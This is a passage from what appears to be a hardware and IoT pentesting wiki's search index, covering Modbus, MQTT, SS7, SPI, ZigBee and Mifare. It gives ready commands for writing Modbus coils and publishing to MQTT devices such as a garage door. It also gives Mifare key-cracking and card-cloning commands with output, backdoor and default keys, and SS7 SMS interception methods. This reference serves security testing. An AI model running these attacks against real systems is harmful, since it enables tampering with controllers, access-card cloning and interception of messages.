--script-args='mms-identify.timeout=500' -p 102 &lt;target_host&gt;\n</code></pre>"},{"location":"protocols/mms/#explore-mms","title":"Explore MMS","text":"<ul> <li>MMS Client Example</li> <li>MMS Server Example</li> </ul>"},{"location":"protocols/mms/#fuzzing-mms","title":"Fuzzing MMS","text":"<ul> <li>61850-fuzzing</li> </ul>"},{"location":"protocols/modbus/","title":"Modbus","text":""},{"location":"protocols/modbus/#discovery","title":"Discovery","text":"<p>Modbus Client:</p> <ul> <li>QModBus</li> <li>pymodbus</li> <li>Modbus Tools</li> </ul> <p>Modbus Discover Nmap Script:</p> <pre><code>nmap --script modbus-discover.nse --script-args='modbus-discover.aggressive=true' -p 502 &lt;host&gt;\n</code></pre> <p>Connect to a Modbus slave:</p> <pre><code>from pymodbus.client import ModbusTcpClient\n\nclient = ModbusTcpClient('&lt;IP_Address_of_Target&gt;')\nclient.connect()\nclient.write_coil(1, True)  # set coil 1\nresult = client.read_coils(1, 1)  # read it back\nprint(result.bits[0])\nclient.close()\n</code></pre> <p>Modbus Pentesting:</p> <ul> <li>smod</li> </ul> <p>Modbus Slave Simulator</p> <ul> <li>Diagslave</li> <li>ModbusPal</li> </ul> <p>Modbus Master Simulator</p> <ul> <li>modpoll</li> </ul>"},{"location":"protocols/mqtt/","title":"MQTT","text":""},{"location":"protocols/mqtt/#discovery","title":"Discovery","text":"<p>MQTT client:</p> <ul> <li>mqtt-spy</li> <li>MQTT CLI</li> <li>MQTT Lens</li> <li>MQTT.fx</li> <li>mosquitto_tools</li> </ul> <p>Scan an MQTT broker with nmap: <code>nmap -p 1883 -vvv --script=mqtt-subscribe -d sensors.domain.com</code></p> <pre><code>mosquitto_sub -h sensors.domain.com -t '#'\nmosquitto_sub -h sensors.domain.com -t '+'\nmosquitto_sub -h sensors.domain.com -t \"/sensor/\"\n</code></pre>"},{"location":"protocols/mqtt/#explore-mqtt","title":"Explore MQTT","text":"<p>Connect and subscribe to every topic using the <code>#</code> wildcard.</p> <pre><code>import paho.mqtt.client as mqtt\n\ndef on_connect(client, userdata, flags, rc):\n    print(\"[+] Connection successful\")\n    client.subscribe('#', qos=1)  # Subscribe to all topics\n    client.subscribe('$SYS/#')  # Broker status (Mosquitto)\n\ndef on_message(client, userdata, msg):\n    print('[+] Topic: %s - Message: %s' % (msg.topic, msg.payload))\n\n# paho-mqtt 1.x callback API; with paho-mqtt 2.x pass\n# mqtt.CallbackAPIVersion.VERSION1 as the first argument of mqtt.Client()\nclient = mqtt.Client(client_id=\"MqttClient\")\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.connect('SERVER IP HERE', 1883, 60)\nclient.loop_forever()\n</code></pre> <p>Send MQTT requests</p> <pre><code>import paho.mqtt.client as mqtt\n\ndef on_connect(client, userdata, flags, rc):\n    print(\"[+] Connection success\")\n\nclient = mqtt.Client(client_id=\"MqttClient\")\nclient.on_connect = on_connect\nclient.connect('IP SERVER HERE', 1883, 60)\nclient.loop_start()  # run the network loop so the publish actually goes out\ninfo = client.publish('smarthouse/garage/door', \"{'open':'true'}\")\ninfo.wait_for_publish()\nclient.loop_stop()\nclient.disconnect()\n</code></pre>"},{"location":"protocols/mqtt/#mqtt-fuzzing","title":"MQTT Fuzzing","text":"<ul> <li>MQTT-Fuzz</li> </ul>"},{"location":"protocols/ntag215-amiibo/","title":"NFC - Amiibo","text":"<p>Amiibo are small figurines or cards produced by Nintendo that contain Near Field Communication (NFC) chips. These chips allow the Amiibo to interact with various Nintendo gaming systems, such as the Wii U, Nintendo 3DS, and Nintendo Switch.</p>"},{"location":"protocols/ntag215-amiibo/#tools","title":"Tools","text":"<ul> <li>socram8888/amiitool - Reverse-engineered amiibo cryptography</li> </ul>"},{"location":"protocols/ntag215-amiibo/#amiibo-encryption","title":"Amiibo Encryption","text":"<p>Nintendo added their own layer of encryption and digital signing to increase security. The digital signing prevents you from blindly altering the game data bytes because then the signature will no longer match.
Additionally, the signature is also based on the UID of the tag, so you can't simply copy the bytes from an Amiibo to a blank NTAG215 to clone it.</p>"},{"location":"protocols/ntag215-amiibo/#password-reverse-engineering","title":"Password Reverse Engineering","text":"<p>The password is derived from the 7-byte tag UID (Unique Identifier) of the Amiibo. The algorithm used to generate the password is as follows:</p> <pre><code>password[0] = 0xAA ^ (uid[1] ^ uid[3])\npassword[1] = 0x55 ^ (uid[2] ^ uid[4])\npassword[2] = 0xAA ^ (uid[3] ^ uid[5])\npassword[3] = 0x55 ^ (uid[4] ^ uid[6])\n</code></pre> <p>The algorithm takes specific bytes of the UID, performs XOR operations with constant values (0xAA and 0x55), and combines them to form the 32-bit password.</p>"},{"location":"protocols/ntag215-amiibo/#references","title":"References","text":"<ul> <li>Reverse Engineering Nintendo Amiibo (NFC Toy) - Apr 27, 2020 - Kevin Brewster</li> <li>Amiibo encryption reverse-engineering - Apr 11, 2015 - Marcos Del Sol Vives</li> </ul>"},{"location":"protocols/signaling-system-7/","title":"SS7 - Signaling System No. 7","text":""},{"location":"protocols/signaling-system-7/#tools","title":"Tools","text":"<ul> <li>P1sec/SigFW - Open Source Signaling Firewall for SS7, Diameter filtering, antispoof and antisniff</li> <li>0xc0decafe/ss7MAPer - SS7 MAP (pen-)testing toolkit</li> <li>SigPloiter/SigPloit - SigPloit: Telecom Signaling Exploitation Framework - SS7, GTP, Diameter &amp; SIP</li> </ul>"},{"location":"protocols/signaling-system-7/#sms-2fa-interception","title":"SMS 2FA Interception","text":"<p>SS7 plays a part in the transportation of SMS messages. 
An attacker may be able to register a victim's <code>MSISDN</code> (mobile number) on a fake <code>MSC</code> (Mobile Switching Centre). The victim's operator's <code>HLR</code> (Home Location Register), which works as a kind of telephone directory for <code>MSISDNs</code>, operators and SMS service centres (<code>SMSC</code>), will then record the new location for the victim's <code>MSISDN</code>.</p> <p>When, in this example, the victim's bank sends them a 2FA authentication token, the originating <code>MSC</code> transfers the SMS to the <code>SMSC</code>; the real <code>SMSC</code> asks the victim's operator's <code>HLR</code> for the victim's location, and the <code>HLR</code> replies with the attacker-operated <code>MSC</code>. The real operator's <code>SMSC</code> then transfers the SMS to the fake <code>MSC</code> operated by the attacker.</p>"},{"location":"protocols/signaling-system-7/#sms-spoofing","title":"SMS Spoofing","text":"<p>One of the simplest and most accessible attacks is SMS spoofing, which doesn't require direct access to the SS7 network. Many people are unaware that the \"from\" field in an SMS message lacks authentication, allowing it to be easily forged. The sender can insert any alphanumeric word into the \"from\" section of a message.</p> <p>SMS spoofing attacks can be carried out with minimal cost by using an SMS gateway service, many of which are accessible on the clear web. According to SOS Intelligence, most of these services lack abuse monitoring or prevention mechanisms. As a result, it\u2019s possible to send spoofed messages to a victim\u2014much like phishing emails\u2014prompting them to take action, often at little to no cost.</p>"},{"location":"protocols/signaling-system-7/#location-tracking","title":"Location Tracking","text":"<p>Within the SS7 network of a network operator it may be possible to request the <code>LAC</code> (Location Area Code) and <code>Cell ID</code> and with that information get a reasonably good location for a victim.
However, this may require prior knowledge of the subscriber's <code>IMEI</code> (International Mobile Equipment Identity) and/or <code>IMSI</code> (International Mobile Subscriber Identity); an <code>MSISDN</code> alone may not be sufficient to query this information.</p>"},{"location":"protocols/signaling-system-7/#references","title":"References","text":"<ul> <li>Exposing The Flaw In Our Phone System - Veritasium - 22 sept. 2024</li> <li>SS7 VULNERABILITIES AND ATTACK EXPOSURE REPORT - 2018</li> <li>A Step by Step Guide to SS7 Attacks - Adam Weinberg - April 30, 2023</li> <li>An investigation into SS7 Exploitation Services on the Dark Web - Amir Hadzipasic - November 17, 2021</li> <li>SS7 ATTACK - Ahmet G\u00f6ker - Apr 28, 2022</li> <li>SCTPscan - Finding entry points to SS7 Networks &amp; Telecommunication Backbones - Philippe Langlois - 19 Apr 2007</li> <li>ss7MAPer \u2013 A SS7 pen testing toolkit - Daniel Mende - February 16, 2016</li> </ul>"},{"location":"protocols/spi/","title":"SPI","text":"<p>Serial Peripheral Interface (SPI) is a synchronous serial communication protocol used primarily in microcontroller-based systems. The controller selects the chip it sends information to and receives information from. NOR flash chips with an SPI interface are commonly used as the firmware boot chip. SPI has one read and one write data line; in QSPI mode, 4 data lines are used in parallel.</p> <p>SPI mainly involves four lines or wires:</p> <ul> <li>MOSI (Master Out Slave In): This is the line through which the master sends data to the slave.</li> <li>MISO (Master In Slave Out): Through this line, the slave sends data back to the master.</li> <li>SCLK (Serial Clock): This line is like a clock ticking, controlled by the master.
It helps in timing the data transfer, ensuring both master and slave are synchronized.</li> <li>SS (Slave Select)/CS (Chip Select): When the master wants to talk to a particular slave, it uses this line to select the slave.</li> </ul>"},{"location":"protocols/spi/#interact-via-spi","title":"Interact via SPI","text":"<ul> <li>Connect to HydraBus and communicate via the SPI protocol <pre><code>screen /dev/ttyACM0 115200\nspi\n\n# RDID Read Identification Sequence example\n[ 0x9f hd:3 ]\n\n# Read data from the beginning of the chip\n[ 0x03 0x00 0x00 0x00 hd:1024 ]\n</code></pre></li> </ul>"},{"location":"protocols/spi/#dump-firmware-via-spi","title":"Dump Firmware via SPI","text":""},{"location":"protocols/spi/#dump-using-a-raspberry-pi","title":"Dump using a Raspberry Pi","text":"<pre><code>sudo raspi-config &gt; Interface &gt; SPI(P4)\n# NOTE: you might need to press/hold the reset button\n\n# check that the chip is detected\nsudo flashrom -p linux_spi:dev=/dev/spidev0.0,spispeed=1000\n\n# dump\nsudo flashrom -p linux_spi:dev=/dev/spidev0.0,spispeed=1000 -r dump.bin\n</code></pre> <p>The ESP8266 and ESP32 have several SPI buses available in hardware. SPI0 is hooked up to their own internal flash and is not intended for use, but the HSPI and VSPI buses can be used in combination with a SOIC-8 clamp to read from SPI NOR chips. 
Cheap clips have a tendency to jump off the chip; the Pomona 5250 has a better grip.</p> <pre><code>$ python ./esptool.py --spi-connection HSPI read_flash 0 0x400000 flash_dump.bin\n</code></pre>"},{"location":"protocols/spi/#dump-with-hydrabus","title":"Dump with HydraBus","text":"<pre><code>flashrom --programmer serprog:dev=/dev/ttyACM0,spispeed=2M -c \"MX25L12833F\" --progress -r /tmp/image.bin\n</code></pre>"},{"location":"protocols/spi/#dump-with-buspirate","title":"Dump with BusPirate","text":"<pre><code>flashrom -p buspirate_spi:dev=/dev/ttyUSB0\nflashrom -p buspirate_spi:dev=/dev/ttyUSB0 -c W25Q64.V\n\nflashrom -p buspirate_spi:dev=/dev/ttyUSB0 -c W25Q64.V -r firmware.bin\n</code></pre>"},{"location":"protocols/spi/#spiffs","title":"SPIFFS","text":"<pre><code>$ cd ~/.arduino15/packages/esp32/tools/esptool/2.3.1\n$ python ./esptool.py -p /dev/ttyUSB0 -b 460800 read_flash 0x300000 0x0fb000 /tmp/spiffs.bin\n\n$ cd ~/.arduino15/packages/esp32/tools/mkspiffs/0.2.3\n# unpack the SPIFFS image into /tmp/data\n$ ./mkspiffs -u /tmp/data -p 256 -b 8192 -s 1028096 /tmp/spiffs.bin\n</code></pre>"},{"location":"protocols/spi/#esp32-diagrams","title":"ESP32 Diagrams","text":"<p>Colour-coded diagram of which ESP HSPI pins can be connected to an SPI flash. 
The pink interfaces (DQ1 and DQ2) are optional; they are only used in QSPI mode.</p> <p> </p>"},{"location":"protocols/spi/#references","title":"References","text":"<ul> <li>Hardware Router CTF - Pen Test Partners - 9 March 2020</li> </ul>"},{"location":"protocols/upnp/","title":"UPnP","text":"<p>TODO</p>"},{"location":"protocols/usb/","title":"USB","text":""},{"location":"protocols/usb/#usb-type-2","title":"USB Type 2","text":""},{"location":"protocols/usb/#usb-type-3","title":"USB Type 3","text":""},{"location":"protocols/usb/#usb-type-c","title":"USB Type C","text":""},{"location":"protocols/usb/#fuzzing","title":"Fuzzing","text":"<ul> <li>HydraBus/HydraUSB3</li> <li>goodfet/Facedancer21 - The purpose of this board is to allow USB devices to be written in host-side Python, so that one workstation can fuzz-test the USB device drivers of another host.</li> <li>USB Studio</li> </ul>"},{"location":"protocols/usb/#references","title":"References","text":"<ul> <li>HydraUSB3 v1.0 Specifications</li> <li>Nullcon Goa 2023 | Cracking With Automated USB Fuzz - Subba Bachina &amp; Conna - 31 Dec. 2023</li> <li>Hands On with Chip Off Non-Volatile Memory - Philip DuBois - June 11, 2024</li> </ul>"},{"location":"protocols/zigbee/","title":"ZigBee","text":"<p>Zigbee is a specification for a suite of high-level communication protocols using low-power digital radios. It's designed for use in areas like home automation, medical data collection, industrial control systems, and other applications that require secure and reliable wireless communication. </p> <p>Zigbee is an IEEE 802.15.4-based wireless networking standard, used mainly for two-way communication between sensors and control systems. 
Like Bluetooth and Wi-Fi, Zigbee is a short-range wireless communication standard, covering a range of 10 to 100 meters.</p>"},{"location":"protocols/zigbee/#tools","title":"Tools","text":"<ul> <li>riverloopsec/killerbee - IEEE 802.15.4/ZigBee Security Research Toolkit</li> <li>APIMote - The ApiMote is ZigBee security research hardware intended for researchers, students, utility companies, etc. to use for learning about and evaluating the security of IEEE 802.15.4/ZigBee systems as authorized.</li> <li>Cognosec/SecBee (archived) - SecBee is a ZigBee security testing tool developed by Cognosec to test ZigBee implementations for security issues</li> </ul>"},{"location":"protocols/zigbee/#default-trust-center-link-key","title":"Default Trust Center Link Key","text":"<p>Zigbee includes several layers of security, including AES-128 encryption, to ensure that data is transmitted securely across the network.</p> <p>The Zigbee Default Trust Center Link Key is a predefined cryptographic key used in Zigbee networks to secure the initial joining process of a new device to the network. It's part of the security measures implemented within the Zigbee protocol to ensure that only authorized devices can join a particular network.</p> <p>When a new device wants to join a Zigbee network, it must first establish a secure connection with the Trust Center. 
To do this, the device and the Trust Center use the Default Trust Center Link Key to encrypt their communication.</p> <p>For the \"Home Automation\" profile the default Trust Center Link Key is: <code>ZigBeeAlliance09</code> (<code>\"5A:69:67:42:65:65:41:6C:6C:69:61:6E:63:65:30:39\"</code>).</p> <p>You can use it in Wireshark: Edit &gt; Preferences &gt; Protocols &gt; Zigbee NWK, then \"New\" and write the key in hex format.</p> <p>Example: CVE-2020-28952 - Athom Homey Static and Well-known Keys</p>"},{"location":"protocols/zigbee/#references","title":"References","text":"<ul> <li>AN1233: Zigbee Security - Silabs</li> <li>Zigbee Security 101 (Architecture And Security Issues) - February 11, 2023 - dattatray</li> <li>Tout, tout, tout vous saurez tout sur le ZigBee / MISC n\u00b086 - July 2016 - Kovacs Nicolas</li> <li>ZIGBEE SECURITY: BASICS (PART 2) - Vishruta Rudresh - November 8, 2017</li> <li>ZIGBEE SECURITY: BASICS (PART 3) - Vishruta Rudresh - November 21, 2017</li> <li>Understanding Zigbee and Wireless Mesh Networking - Ray Felch - 27 Aug 2021</li> <li>ZigBee Penetration Testing: Strengthen Your IoT Security - RF Security - 12/08/2022</li> <li>pCTF 2011 #32 That's no bluetooth - STALKR - TUESDAY, APRIL 26, 2011</li> </ul>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/","title":"HF - Mifare Classic","text":""},{"location":"protocols/rfid-nfc/hf-mifare-classic/#hf-mifare-classic-1k","title":"HF - Mifare Classic 1k","text":"<p>New method for Proxmark: <code>hf mf autopwn</code></p>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#dictionary-attack","title":"Dictionary attack","text":"<p>Common keys to try against the card when attempting a dictionary attack.</p> <ul> <li><code>FFFFFFFFFFFF</code> - Default key</li> <li><code>000000000000</code> - Blank key</li> <li><code>A396EFA4E24F</code> - FM11RF08S universal backdoor key</li> <li><code>A31667A8CEC1</code> - FM11RF08 older backdoor key</li> </ul> <p>More keys and dictionaries can be found at the following links:</p> <ul> <li>RfidResearchGroup/proxmark3/dictionaries</li> 
<li>ikarus23/MifareClassicTool/std.keys</li> <li>ikarus23/MifareClassicTool/extended-std.keys</li> </ul> <pre><code>hf mf chk *1 ? t # Default keys\nhf mf chk *1 ? d default_keys.dic\nhf mf chk 0 A default_keys.dic # Dictionary attack with file: default_keys.dic\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#darkside-attack-prng-weak","title":"Darkside attack (PRNG Weak)","text":"<p>Proxmark method</p> <pre><code>pm3&gt; hf search\npm3&gt; hf mfu\npm3&gt; hf mf darkside (fork command)\npm3&gt; hf mf mifare (original command)\nParity is all zero. Most likely this card sends NACK on every failed authentication. # Card is empty...\nor\nFound valid key:ffffffffffff # KEY_FOUND\n\npm3&gt; hf mf chk 0 A KEY_FOUND (Check Found Key On Block 0 A)\n</code></pre> <p>ACR122u method</p> <pre><code># start cracking the first key of the first sector. \nmfcuk -C -R 0:A -v 3 -s 250 -S 250\nmfcuk -C -R 3:A -v 3 -s 250 -S 250 -o mycard.mfc\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#nested-attack-prng-weak","title":"Nested attack (PRNG Weak)","text":"<p>A known key (e.g. a default key) is needed to extract the others.</p> <p>Proxmark method</p> <pre><code>hf search\nhf mf chk 1 ? t # \"Test Block Keys\" command which will test the default keys for us\nhf mf nested 1 0 A a0a1a2a3a4a5 t # \"Nested Attack\" using the key a0a1a2a3a4a5, keeping the keys in memory with \"t\"\nhf mf chk * ? # \"Test Block Keys\" command which will test the default keys for us\nhf mf nested 1 0 A ffffffffffff d # \"Nested Attack\" using the key ffffffffffff to extract the others (file: dumpkeys.bin)\nhf mf dump 1 # Dump content\nhf mf restore 1 # Restore content into the card\nhf mf wrbl 5 A 080808080808 32110000cdeeffff3211000005fa05fa # write on block 5, with the key 0808... 
the content 3211...\nhf mf rdbl 5 A 080808080808 # Read block 5 with the key 0808..\n\n\npython pm3_mfd2eml.py dumpdata.bin dumpdata.eml\npm3&gt; hf mf cload dumpdata\n</code></pre> <p>ACR122u method</p> <pre><code>nfc-list\nmfoc -O card.mfd # dump the memory of the tag\n# The P option sets the number of probes per sector. By default it is 20, but it can be raised to 500.\nmfoc -P 500 -O dump_first_try.dmp\nnfc-mfclassic w a key.mfd data.mfd # write data\nnfc-mfclassic W a key.mfd data.mfd # write data and sector 0\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#hardnested-attack","title":"Hardnested attack","text":"<p>One key is needed in order to use this attack.</p> <p>For the newest MIFARE Classic and MIFARE Plus SL1.</p> <p>Proxmark method</p> <p> NOTE: The hardware changes of the Proxmark 3 Easy left it incapable of performing several of the Proxmark's advanced features, including the Mifare Hard-Nested attacks. In other words, you need a real Proxmark, not a cheap Chinese copy.</p> <pre><code># find a default key\n# the res column is either 1 or 0. \n# A 1 in the column means the key was valid for that sector.\nhf mf chk *1 ? t\n\n\n# &lt;block number&gt; &lt;key A|B&gt; &lt;key (12 hex symbols)&gt;\n# &lt;target block number&gt; &lt;target key A|B&gt; [known target key (12 hex symbols)] [w] [s]\n# w: Acquire nonces and write them to binary file nonces.bin\nhf mf hardnested 0 A 8829da9daf76 4 A w\n\n# then https://github.com/aczid/crypto1_bs\n./solve_piwi 0xcafec0de.bin\n./solve_piwi_bs 0xcafec0de.bin\n</code></pre> <p>ACR122u method</p> <p>With key A a0a1a2a3a4a5 known for sector 0, we want key A for sector 1. 
This method can be reused for every sector.</p> <pre><code>./libnfc_crypto1_crack a0a1a2a3a4a5 0 a 4 a\nFound tag with uid 62ef9e5a, collecting nonces for key A of block 4 (sector 1) using known key A a0a1a2a3a4a5 for block 0 (sector 0)\nCollected 2379 nonces... leftover complexity 23833993588 (~2^34.47) - initializing brute-force phase...\nStarting 4 threads to test 23833993588 states using 256-way bitslicing\nCracking... 88.93%\nFound key: c44e2b5e4ce3\nTested 21232975852 states\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#magic-chinese-card-acronyms","title":"Magic Chinese Card - Acronyms","text":"<p>UID - The original Chinese Magic Backdoor card. These cards respond to the backdoor commands and will show <code>Chinese magic backdoor commands (GEN 1a) detected</code> when you run <code>hf search</code>. These cards can be detected by probing the card to see if it responds to the backdoor commands. Some RFID systems may try to detect these cards.</p> <p>CUID - The 2nd generation Chinese Magic Backdoor card. These cards do not use the backdoor commands, but instead allow Block 0 to be written to like any other block on the card. This gives the card better compatibility for being written from an Android phone. However, some RFID systems can detect this type of card by sending a write command to Block 0, making the card invalid after the first use is attempted.</p> <p>FUID - This type of card is not as common, but allows Block 0 to be written to just once. This allows you to create a clone of a card, and any checks done by the RFID system will pass because Block 0 is no longer writable.</p> <p>UFUID - This type of card is apparently a \"better\" version of the FUID card. Instead of only allowing Block 0 to be written once, you can write to it many times and then lock the block later when you're happy with the result. After locking Block 0, it cannot be unlocked to my knowledge. 
I do not think there is currently a way to lock these cards using the Proxmark3.</p>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#magic-chinese-card-gen-2","title":"Magic Chinese Card - GEN 2","text":"<p>They can be copied directly. The software allows a new UID.</p>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#magic-chinese-card-gen-1a","title":"Magic Chinese Card - GEN 1a","text":"<p>Works better on the official client.py than on the iceman fork.</p> <p>Reset a UID Changeable Magic Card (7-byte UID). You should prefer this method!</p> <pre><code>proxmark3&gt; hf mf csetuid 42917CAB 0004 08\nuid:42 91 7c ab \n--atqa:00 04 sak:08 \nChinese magic backdoor commands (GEN 1a) detected \n</code></pre> <p>To set the whole block: <code>hf mf csetblk 0 42917CAB00080400022A2C87933EF21D</code></p> <p>NOTE: The UID of some cards can be computed from the displayed ID, e.g. when the ID is 2910621770 (the UID is the little-endian 32-bit encoding of that number):</p> <pre><code>import struct\n# Python 3: pack as little-endian unsigned 32-bit, then hex-encode\nstruct.pack('&lt;I', 2910621770).hex()\n'4a907cad'\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#unbricking-chinese-magic-mifare-classic","title":"Unbricking Chinese Magic Mifare Classic","text":"<p>If you set the wrong BCC for the UID and can't read the card anymore, you can use some backdoor commands to change sector 0 using Proxmark:</p> <pre><code>hf 14a raw -a -p -b 7 40\nhf 14a raw -p 43\nhf 14a raw -p -c a0 00\nhf 14a raw -p -c de ad be ef 22 08 04 00 46 59 25 58 49 10 23 02\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#write-and-read-sectors","title":"Write and read sectors","text":"<p>Avoid writing block 3 (the sector trailer, which contains keys A/B and the access bits)</p> <pre><code>proxmark3&gt; hf mf wrbl 1 a ffffffffffff 000102030405060708090a0b0c0d0e0f \nproxmark3&gt; hf mf wrbl 2 a ffffffffffff 464c4147313a4d31664072335f303037\n</code></pre> <pre><code>hf mf rdsc &lt;sector number&gt; &lt;key A/B&gt; &lt;key (12 hex 
symbols)&gt;\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#dump-mifare-card","title":"Dump Mifare card","text":"<pre><code>proxmark3&gt; hf mf dump 1 k hf-mf-A29558E4-key.bin f hf-mf-A29558E4-data.bin\n\n&lt;card memory&gt;: 0 = 320 bytes (Mifare Mini), 1 = 1K (default), 2 = 2K, 4 = 4K\nk &lt;name&gt; : key filename, if no &lt;name&gt; given, UID will be used as filename\nf &lt;name&gt; : data filename, if no &lt;name&gt; given, UID will be used as filename\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#simulate-and-emulate-mifare-card","title":"Simulate and emulate Mifare card","text":"<p>Emulate from a dump file</p> <pre><code># convert .bin to .eml\nproxmark3&gt; script run dumptoemul -i dumpdata.bin\nproxmark3&gt; hf mf eload &lt;file name w/o .eml&gt;\n</code></pre> <p>Simulate Mifare 1K UID</p> <pre><code>proxmark3&gt; hf mf sim u 353c2aa6\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#mitm-attack","title":"MITM attack","text":"<pre><code>hf 14a snoop\n# read card\n# push button\n\nhf list 14a\n089220 | 095108 | Tag | 4d xx xx xx d3 | | UID\n114608 | 125072 | Rdr | 93 70 4d xx xx xx d3 4f 8d | ok | SELECT_UID\n...\n525076 | 529748 | Tag | 61 7a 66 18 | | TAG CHALLENGE\n540608 | 549920 | Rdr |50! 87! 8e ab 3b! 49 5a 1b | !crc| HALT\n551188 | 555860 | Tag |d6! 53! 7c 57! 
| | TAG RESPONSE\nUID: 4dxxxxxxd3\nTAG CHALLENGE: 617a6618\nREADER CHALLENGE: 50878eab\nREADER RESPONSE: 3b495a1b\nTAG RESPONSE: d6537c57\n\n# crapto1gui or mfkey\ncd tools/mfkey\nmake\n./mfkey64\n./mfkey64 xxxxxxxx 3b45a45a 7ddb6646 142fc1b9 9195fb3f\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#reader-only-attack","title":"Reader only attack","text":"<p>Emulate a MIFARE Classic with a DEADBEEF UID.</p> <pre><code>proxmark3&gt; hf mf sim u deadbeef n 1 x\nmf 1k sim uid: de ad be ef , numreads:0, flags:18 (0x12)\n#db# Collected two pairs of AR/NR which can be used to extract keyA from reader for sector 1:\n#db# ../tools/mfkey/mfkey32 deadbeef 0102xxxx 4d9axxxx 87e7xxxx 06d2xxxx b4a0xxxx\n#db# Emulator stopped. Tracing: 1 trace length: 253\n#db# 4B UID: deadbeef\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#read-a-mifare-dump","title":"Read a Mifare Dump","text":"<pre><code>pip install bitstring\ngit clone https://github.com/zhovner/mfdread\nmfdread.py ./dump.mfd\n</code></pre>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#hf-mifare-classic-4k","title":"HF - Mifare Classic 4k","text":""},{"location":"protocols/rfid-nfc/hf-mifare-classic/#chinese-magic-mifare-classic-4k","title":"Chinese Magic Mifare Classic 4K","text":"<p>Block 0 is writable through normal Mifare Classic commands, i.e. there is not special \"unlocked\" read/write like in \"magic Mifare 1k\" version.</p> <p>Writing block 0 with Proxmark, UID <code>01020304</code>, using key A being <code>FFFFFFFFFFFF</code>:</p> <pre><code>hf mf wrbl 0 a FFFFFFFFFFFF 01020304040000000000000000000000\n</code></pre> <p>Again, watch out to have correct BCC and avoid Cascading Tag (0x88) as first byte of UID, or you may make the card unselectable (i.e. 
brick it).</p>"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#references","title":"References","text":"<ul> <li>Mifare HowTo - Qais Patankar - Jan 7, 2018</li> <li>Proxmark3 Mifare Classic 1k Weak / Hard - Guillaume - November 29, 2017</li> <li>Electronique/Hardware/Divers/RFID/Proxmak3/Mf (Mifare) - 12 January 2022</li> <li>Proxmark 3, le couteau suisse RFID - Bourdin Pierre - October 2017</li> <li>Hacking MIFARE &amp; RFID - phantasmthewhite - Jan 22, 2019</li> <li>Hacking our first MIFARE/RFID Tag - phantasmthewhite - Feb 1, 2019</li> <li>Coffee, NFC, Exploit, Coffee again - ari_ - 14 NOVEMBER 2017</li> <li>ACR122U, mfcuk, and mfoc: Cracking MIFARE Classic on Arch Linux - Linus Karlsson - 2014-08-18</li> <li>Reading NFC cards - Flipper Docs</li> <li>MIFARE Classic: exposing the static encrypted nonce variant - Philippe Teuwen</li> </ul>"},{"location":"protocols/rfid-nfc/hf-mifare-desfire/","title":"HF - Mifare DESFire","text":""},{"location":"protocols/rfid-nfc/hf-mifare-desfire/#desfire-format","title":"DESFire\u00ae Format","text":"<ul> <li>Mifare DESFire MF3ICD40: uses 3DES encryption, product discontinued.</li> <li>Mifare DESFire EV1: secure channel that can work with all the key types: DES, two-key 3DES, three-key 3DES and AES. Limited to 28 applications containing a maximum of 32 files per application.</li> <li>Mifare DESFire EV2: the newest secure channel, which works with AES keys only.</li> <li>Mifare DESFire EV3: enhanced transaction speed and even better multi-application support.</li> </ul> <p>Each card has a master application with AID <code>0x000000</code> that holds the card's configuration. 
The memory organization of DESFire supports up to 28 applications on the card and up to 32 files in each application.</p> <ul> <li>Master Application (0x000000)</li> <li>Applications<ul> <li>Files</li> </ul> </li> </ul>"},{"location":"protocols/rfid-nfc/hf-mifare-desfire/#applications","title":"Applications","text":"<pre><code>hf mfdes lsapp --no-auth # show applications list without authentication\nhf mfdes lsapp # show applications list with authentication from default settings\nhf mfdes lsapp --files # show applications list with their files\nhf mfdes getaids --no-auth # this command can return a simple AID list if it is enabled in the card settings\n</code></pre> <p>Each application has an individual set of up to 14 application keys (AES-128 or DES keys).</p>"},{"location":"protocols/rfid-nfc/hf-mifare-desfire/#files","title":"Files","text":"<ul> <li>Standard File: used for static data like an employee ID</li> <li>Backup File: like a Standard File but with a \"Commit\" feature that allows for secure storage of data, e.g. a changeable user password</li> <li>Value File: storing changeable value information, e.g. the amount on a canteen payment card</li> <li>Linear Record File: storing a defined number of records, e.g. a list of collected items</li> <li>Cyclic Record File: like a Linear Record File, but this file never gets \"full\": the oldest entry is overwritten by a new entry, e.g. 
for a log file</li> </ul> <p>Each file has its own Communication Mode:</p> <ul> <li>Plain: all data transfer between the NFC tag and the NFC reader is done in plaintext</li> <li>MACed: as in Plain mode the communication is readable, but it is secured by an appended MAC</li> <li>Encrypted: the communication is not readable by anyone except the holder of the key in use.</li> </ul> <p>Dump files</p> <pre><code>hf mfdes lsfiles --aid 123456 -t aes # file list for application 123456 with aes key\nhf mfdes dump --aid 123456 # shows files and their contents from application 123456\n</code></pre> <p>Read/Write files</p> <p>Read</p> <pre><code>hf mfdes read --aid 123456 --fid 01 # autodetect file type (with hf mfdes getfilesettings) and read its contents\nhf mfdes read --aid 123456 --fid 01 --type record --offset 000000 --length 000001 # read the last record from a record file\n</code></pre> <p>Read via ISO command set</p> <pre><code>hf mfdes read --aid 123456 --fileisoid 1000 --type data -c iso # select application via native command and then read file via ISO\nhf mfdes read --appisoid 0102 --fileisoid 1000 --type data -c iso # select all via ISO commands and then read\nhf mfdes read --appisoid 0102 --fileisoid 1100 --type record -c iso --offset 000005 --length 000001 # read one record (number 5) from file ID 1100 via ISO command set\nhf mfdes read --appisoid 0102 --fileisoid 1100 --type record -c iso --offset 000005 --length 000000 # read all the records (from 5 to 1) from file ID 1100 via ISO command set\n</code></pre> <p>Write</p> <pre><code>hf 